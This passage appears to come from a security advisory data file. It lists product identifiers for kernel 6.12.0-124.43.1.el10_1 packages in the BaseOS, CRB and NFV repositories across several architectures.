"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
